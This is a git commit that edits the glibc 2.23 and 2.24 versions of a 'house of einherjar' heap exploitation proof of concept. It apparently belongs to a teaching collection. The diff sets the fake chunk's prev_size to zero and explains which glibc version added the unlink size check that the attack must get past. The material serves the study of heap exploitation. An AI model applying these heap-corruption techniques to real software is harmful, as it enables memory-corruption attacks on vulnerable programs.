fix: remove unnecessary size equality check bypass

D4R30 · D4R30 · commit 81223bd6b064 · 2025-10-29T15:47:20.000-04:00
The `P-&gt;bk-&gt;size == P-&gt;prev_size` check in unlink() was introduced in
GLIBC 2.26 and does not exist in the implementations of GLIBC 2.23 or
2.24. Therefore, fake_chunk[0] and fake_chunk[1] do not need to be
equal in these versions.

The original note explicitly stated that they should be equal, which
could be misleading in many situations.
diff --git a/glibc_2.23/house_of_einherjar.c b/glibc_2.23/house_of_einherjar.c
@@ -38,7 +38,7 @@ int main()
 
 	size_t fake_chunk[6];
 
-	fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
+	fake_chunk[0] = 0x00; // The prev_size vs. size check is of no concern, until GLIBC 2.26 P->bk->size == P->prev_size check
 	fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
 	fake_chunk[2] = (size_t) fake_chunk; // fwd
 	fake_chunk[3] = (size_t) fake_chunk; // bck
diff --git a/glibc_2.24/house_of_einherjar.c b/glibc_2.24/house_of_einherjar.c
@@ -38,7 +38,7 @@ int main()
 
 	size_t fake_chunk[6];
 
-	fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
+	fake_chunk[0] = 0x00; // The prev_size vs. size check is of no concern, until GLIBC 2.26 P->bk->size == P->prev_size check
 	fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
 	fake_chunk[2] = (size_t) fake_chunk; // fwd
 	fake_chunk[3] = (size_t) fake_chunk; // bck
